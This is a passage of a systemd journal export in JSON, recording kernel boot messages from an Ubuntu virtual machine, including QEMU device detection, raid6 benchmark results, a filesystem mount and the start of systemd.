: "1615280779999022", 
"__MONOTONIC_TIMESTAMP" : "5715911", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1464412", "MESSAGE" : "input: VirtualPS/2 VMware VMMouse as /devices/platform/i8042/serio1/input/input3" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1ae;b=e2b08827b5804427b422c10c84f1567e;m=5737d5;t=5bd16dd1ab73d;x=5c0c31abe2badf4e", "__REALTIME_TIMESTAMP" : "1615280779999037", "__MONOTONIC_TIMESTAMP" : "5715925", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1492169", "MESSAGE" : "AVX2 version of gcm_enc/dec engaged." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1af;b=e2b08827b5804427b422c10c84f1567e;m=5737e0;t=5bd16dd1ab748;x=940d0df36e6f4f07", "__REALTIME_TIMESTAMP" : "1615280779999048", "__MONOTONIC_TIMESTAMP" : "5715936", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1494593", "MESSAGE" : "AES CTR mode by8 optimization enabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1b0;b=e2b08827b5804427b422c10c84f1567e;m=573866;t=5bd16dd1ab7ce;x=49437386093b2439", "__REALTIME_TIMESTAMP" : "1615280779999182", "__MONOTONIC_TIMESTAMP" : "5716070", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "virtio", "_KERNEL_DEVICE" : "+virtio:virtio0", 
"_UDEV_SYSNAME" : "virtio0", "_SOURCE_MONOTONIC_TIMESTAMP" : "1518610", "MESSAGE" : "virtio_net virtio0 ens3: renamed from eth0" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1b1;b=e2b08827b5804427b422c10c84f1567e;m=576eb1;t=5bd16dd1aee19;x=f8ac91959c4aa0c7", "__REALTIME_TIMESTAMP" : "1615280780013081", "__MONOTONIC_TIMESTAMP" : "5729969", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "usb", "_UDEV_DEVNODE" : "/dev/bus/usb/001/002", "_UDEV_SYSNAME" : "1-1", "_KERNEL_DEVICE" : "c189:1", "_SOURCE_MONOTONIC_TIMESTAMP" : "1637764", "MESSAGE" : "usb 1-1: New USB device found, idVendor=0627, idProduct=0001" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1b2;b=e2b08827b5804427b422c10c84f1567e;m=576f8a;t=5bd16dd1aeef1;x=3dee08a725e18662", "__REALTIME_TIMESTAMP" : "1615280780013297", "__MONOTONIC_TIMESTAMP" : "5730186", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "usb", "_UDEV_DEVNODE" : "/dev/bus/usb/001/002", "_UDEV_SYSNAME" : "1-1", "_KERNEL_DEVICE" : "c189:1", "_SOURCE_MONOTONIC_TIMESTAMP" : "1642734", "MESSAGE" : "usb 1-1: New USB device strings: Mfr=1, Product=3, SerialNumber=5" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1b3;b=e2b08827b5804427b422c10c84f1567e;m=577050;t=5bd16dd1aefb7;x=f535519e98e61b88", "__REALTIME_TIMESTAMP" : "1615280780013495", "__MONOTONIC_TIMESTAMP" : "5730384", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "usb", 
"_UDEV_DEVNODE" : "/dev/bus/usb/001/002", "_UDEV_SYSNAME" : "1-1", "_KERNEL_DEVICE" : "c189:1", "_SOURCE_MONOTONIC_TIMESTAMP" : "1647407", "MESSAGE" : "usb 1-1: Product: QEMU USB Tablet" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1b4;b=e2b08827b5804427b422c10c84f1567e;m=57712b;t=5bd16dd1af092;x=f90ca1ec6fed0efe", "__REALTIME_TIMESTAMP" : "1615280780013714", "__MONOTONIC_TIMESTAMP" : "5730603", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "usb", "_UDEV_DEVNODE" : "/dev/bus/usb/001/002", "_UDEV_SYSNAME" : "1-1", "_KERNEL_DEVICE" : "c189:1", "_SOURCE_MONOTONIC_TIMESTAMP" : "1650426", "MESSAGE" : "usb 1-1: Manufacturer: QEMU" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1b5;b=e2b08827b5804427b422c10c84f1567e;m=5771cf;t=5bd16dd1af137;x=6effa3dd88249486", "__REALTIME_TIMESTAMP" : "1615280780013879", "__MONOTONIC_TIMESTAMP" : "5730767", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "usb", "_UDEV_DEVNODE" : "/dev/bus/usb/001/002", "_UDEV_SYSNAME" : "1-1", "_KERNEL_DEVICE" : "c189:1", "_SOURCE_MONOTONIC_TIMESTAMP" : "1652712", "MESSAGE" : "usb 1-1: SerialNumber: 42" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1b6;b=e2b08827b5804427b422c10c84f1567e;m=5771df;t=5bd16dd1af147;x=74843213c1fa40c2", "__REALTIME_TIMESTAMP" : "1615280780013895", "__MONOTONIC_TIMESTAMP" : "5730783", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1663951", "MESSAGE" 
: "hidraw: raw HID events driver (C) Jiri Kosina" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1b7;b=e2b08827b5804427b422c10c84f1567e;m=5771eb;t=5bd16dd1af152;x=3fa757cf0911c4bc", "__REALTIME_TIMESTAMP" : "1615280780013906", "__MONOTONIC_TIMESTAMP" : "5730795", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1672727", "MESSAGE" : "usbcore: registered new interface driver usbhid" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1b8;b=e2b08827b5804427b422c10c84f1567e;m=5771f6;t=5bd16dd1af15d;x=d7ad4f6be75220d5", "__REALTIME_TIMESTAMP" : "1615280780013917", "__MONOTONIC_TIMESTAMP" : "5730806", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1675949", "MESSAGE" : "usbhid: USB HID core driver" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1b9;b=e2b08827b5804427b422c10c84f1567e;m=577201;t=5bd16dd1af168;x=bad386160cda6776", "__REALTIME_TIMESTAMP" : "1615280780013928", "__MONOTONIC_TIMESTAMP" : "5730817", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1680012", "MESSAGE" : "input: QEMU QEMU USB Tablet as /devices/pci0000:00/0000:00:01.2/usb1/1-1/1-1:1.0/0003:0627:0001.0001/input/input5" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1ba;b=e2b08827b5804427b422c10c84f1567e;m=5772b8;t=5bd16dd1af21f;x=60b309e1216b01cf", "__REALTIME_TIMESTAMP" : "1615280780014111", "__MONOTONIC_TIMESTAMP" : "5731000", "_BOOT_ID" : 
"e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "hid", "_KERNEL_DEVICE" : "+hid:0003:0627:0001.0001", "_UDEV_SYSNAME" : "0003:0627:0001.0001", "_SOURCE_MONOTONIC_TIMESTAMP" : "1686104", "MESSAGE" : "hid-generic 0003:0627:0001.0001: input,hidraw0: USB HID v0.01 Mouse [QEMU QEMU USB Tablet] on usb-0000:00:01.2-1/input0" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1bb;b=e2b08827b5804427b422c10c84f1567e;m=5772c9;t=5bd16dd1af230;x=d78d55fa5ce30379", "__REALTIME_TIMESTAMP" : "1615280780014128", "__MONOTONIC_TIMESTAMP" : "5731017", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "3296328", "MESSAGE" : "raid6: sse2x1 gen() 7874 MB/s" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1bc;b=e2b08827b5804427b422c10c84f1567e;m=5772d4;t=5bd16dd1af23b;x=ce4ea08b3ccb4878", "__REALTIME_TIMESTAMP" : "1615280780014139", "__MONOTONIC_TIMESTAMP" : "5731028", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "3344238", "MESSAGE" : "raid6: sse2x1 xor() 5550 MB/s" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1bd;b=e2b08827b5804427b422c10c84f1567e;m=5772e4;t=5bd16dd1af24b;x=7bc7e78bc9790bf6", "__REALTIME_TIMESTAMP" : "1615280780014155", "__MONOTONIC_TIMESTAMP" : "5731044", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : 
"ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "3392314", "MESSAGE" : "raid6: sse2x2 gen() 9546 MB/s" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1be;b=e2b08827b5804427b422c10c84f1567e;m=5772ef;t=5bd16dd1af256;x=3dbd33bf27e28938", "__REALTIME_TIMESTAMP" : "1615280780014166", "__MONOTONIC_TIMESTAMP" : "5731055", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "3440394", "MESSAGE" : "raid6: sse2x2 xor() 5985 MB/s" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1bf;b=e2b08827b5804427b422c10c84f1567e;m=5772fa;t=5bd16dd1af261;x=7565dec281561875", "__REALTIME_TIMESTAMP" : "1615280780014177", "__MONOTONIC_TIMESTAMP" : "5731066", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "3488308", "MESSAGE" : "raid6: sse2x4 gen() 11387 MB/s" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1c0;b=e2b08827b5804427b422c10c84f1567e;m=577304;t=5bd16dd1af26c;x=ad30cde6b6b3611d", "__REALTIME_TIMESTAMP" : "1615280780014188", "__MONOTONIC_TIMESTAMP" : "5731076", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "3536314", "MESSAGE" : "raid6: sse2x4 xor() 7165 MB/s" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1c1;b=e2b08827b5804427b422c10c84f1567e;m=57730f;t=5bd16dd1af276;x=298656716ca4c04c", "__REALTIME_TIMESTAMP" : "1615280780014198", "__MONOTONIC_TIMESTAMP" : "5731087", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", 
"_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "3584342", "MESSAGE" : "raid6: avx2x1 gen() 15727 MB/s" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1c2;b=e2b08827b5804427b422c10c84f1567e;m=57731a;t=5bd16dd1af281;x=b8ab218585856e3", "__REALTIME_TIMESTAMP" : "1615280780014209", "__MONOTONIC_TIMESTAMP" : "5731098", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "3632230", "MESSAGE" : "raid6: avx2x1 xor() 10348 MB/s" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1c3;b=e2b08827b5804427b422c10c84f1567e;m=577325;t=5bd16dd1af28c;x=c972aafa65f71950", "__REALTIME_TIMESTAMP" : "1615280780014220", "__MONOTONIC_TIMESTAMP" : "5731109", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "3680173", "MESSAGE" : "raid6: avx2x2 gen() 18874 MB/s" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1c4;b=e2b08827b5804427b422c10c84f1567e;m=57732f;t=5bd16dd1af297;x=f9956d03be3640d1", "__REALTIME_TIMESTAMP" : "1615280780014231", "__MONOTONIC_TIMESTAMP" : "5731119", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "3728145", "MESSAGE" : "raid6: avx2x2 xor() 11197 MB/s" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1c5;b=e2b08827b5804427b422c10c84f1567e;m=57733a;t=5bd16dd1af2a2;x=e3598bac0d84f0c6", "__REALTIME_TIMESTAMP" : "1615280780014242", "__MONOTONIC_TIMESTAMP" : "5731130", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "3776130", "MESSAGE" : "raid6: avx2x4 gen() 22113 MB/s" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1c6;b=e2b08827b5804427b422c10c84f1567e;m=577345;t=5bd16dd1af2ac;x=b7e90dc8886b1e0d", "__REALTIME_TIMESTAMP" : "1615280780014252", "__MONOTONIC_TIMESTAMP" : "5731141", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "3824241", "MESSAGE" : "raid6: avx2x4 xor() 13990 MB/s" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1c7;b=e2b08827b5804427b422c10c84f1567e;m=577352;t=5bd16dd1af2ba;x=5b95a6e5199c574c", "__REALTIME_TIMESTAMP" : "1615280780014266", "__MONOTONIC_TIMESTAMP" : "5731154", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "3826541", "MESSAGE" : "raid6: using algorithm avx2x4 gen() 22113 MB/s" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1c8;b=e2b08827b5804427b422c10c84f1567e;m=57735d;t=5bd16dd1af2c5;x=8d5b31e4c883c5fd", "__REALTIME_TIMESTAMP" : "1615280780014277", "__MONOTONIC_TIMESTAMP" : "5731165", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : 
"e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "3829277", "MESSAGE" : "raid6: .... xor() 13990 MB/s, rmw enabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1c9;b=e2b08827b5804427b422c10c84f1567e;m=577368;t=5bd16dd1af2cf;x=6bc886e2a58855e5", "__REALTIME_TIMESTAMP" : "1615280780014287", "__MONOTONIC_TIMESTAMP" : "5731176", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "3831902", "MESSAGE" : "raid6: using avx2x2 recovery algorithm" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1ca;b=e2b08827b5804427b422c10c84f1567e;m=577394;t=5bd16dd1af2fb;x=5df3582cd4095529", "__REALTIME_TIMESTAMP" : "1615280780014331", "__MONOTONIC_TIMESTAMP" : "5731220", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "3836699", "MESSAGE" : "xor: automatically using best checksumming function avx " } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1cb;b=e2b08827b5804427b422c10c84f1567e;m=5773a0;t=5bd16dd1af308;x=cc096be16c5b0a3a", "__REALTIME_TIMESTAMP" : "1615280780014344", "__MONOTONIC_TIMESTAMP" : "5731232", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "3842043", "MESSAGE" : "async_tx: api initialized (async)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1cc;b=e2b08827b5804427b422c10c84f1567e;m=5773af;t=5bd16dd1af316;x=6d453969632a59c1", "__REALTIME_TIMESTAMP" : 
"1615280780014358", "__MONOTONIC_TIMESTAMP" : "5731247", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "3908006", "MESSAGE" : "Btrfs loaded, crc32c=crc32c-intel" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1cd;b=e2b08827b5804427b422c10c84f1567e;m=5773bd;t=5bd16dd1af324;x=967a662793c4f2ca", "__REALTIME_TIMESTAMP" : "1615280780014372", "__MONOTONIC_TIMESTAMP" : "5731261", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "3937225", "MESSAGE" : "random: fast init done" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1ce;b=e2b08827b5804427b422c10c84f1567e;m=5773c9;t=5bd16dd1af330;x=69fd3a294d658dcf", "__REALTIME_TIMESTAMP" : "1615280780014384", "__MONOTONIC_TIMESTAMP" : "5731273", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "4003689", "MESSAGE" : "random: wait-for-root: uninitialized urandom read (16 bytes read)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1cf;b=e2b08827b5804427b422c10c84f1567e;m=5773d4;t=5bd16dd1af33c;x=fd3648774e170cb5", "__REALTIME_TIMESTAMP" : "1615280780014396", "__MONOTONIC_TIMESTAMP" : "5731284", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "MESSAGE" : "random: wait-for-root: uninitialized urandom read (16 bytes read)", 
"_SOURCE_MONOTONIC_TIMESTAMP" : "4007486" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1d0;b=e2b08827b5804427b422c10c84f1567e;m=5773f1;t=5bd16dd1af359;x=e99a633f94b1be11", "__REALTIME_TIMESTAMP" : "1615280780014425", "__MONOTONIC_TIMESTAMP" : "5731313", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "MESSAGE" : "random: wait-for-root: uninitialized urandom read (16 bytes read)", "_SOURCE_MONOTONIC_TIMESTAMP" : "4011196" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1d1;b=e2b08827b5804427b422c10c84f1567e;m=577400;t=5bd16dd1af367;x=f558cf2ce7cf1e96", "__REALTIME_TIMESTAMP" : "1615280780014439", "__MONOTONIC_TIMESTAMP" : "5731328", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "4095523", "MESSAGE" : "EXT4-fs (vda1): mounted filesystem with ordered data mode. 
Opts: (null)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1d2;b=e2b08827b5804427b422c10c84f1567e;m=57740c;t=5bd16dd1af374;x=9b3dda8076202fc4", "__REALTIME_TIMESTAMP" : "1615280780014452", "__MONOTONIC_TIMESTAMP" : "5731340", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "4792547", "MESSAGE" : "ip_tables: (C) 2000-2006 Netfilter Core Team" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1d3;b=e2b08827b5804427b422c10c84f1567e;m=57741c;t=5bd16dd1af383;x=1cbee677ef6ff7e8", "__REALTIME_TIMESTAMP" : "1615280780014467", "__MONOTONIC_TIMESTAMP" : "5731356", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "4828132", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "SYSLOG_PID" : "1", "MESSAGE" : "systemd 237 running in system mode. (+PAM 